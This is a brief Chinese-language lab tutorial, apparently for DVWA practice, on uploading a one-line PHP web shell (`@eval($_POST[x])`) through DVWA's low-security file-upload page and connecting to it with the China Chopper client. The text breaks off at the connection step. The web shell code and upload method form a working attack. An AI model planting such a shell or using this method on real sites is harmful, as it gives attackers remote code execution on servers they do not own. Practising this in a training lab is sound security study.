一句话木马
需要准备:
DVWA
环境:DVWA 环境部署一个软件:菜刀
密码:neko
1.入侵条件
其中,只要攻击者满足三个条件,就能实现成功入侵:
(1)木马上传成功,未被杀;
(2)知道木马的路径在哪;
(3)上传的木马能正常运行。
2.写一个简单的木马
<?php @eval($_POST[x])?>
3.进入DVWA
http://10.9.29.124/DVWA-master/vulnerabilities/upload/
还是进入网页 选择low
4.上传
上传刚刚写好的 shell.php
文件
5.打开菜刀
在另一台电脑打开菜刀
右键添加网址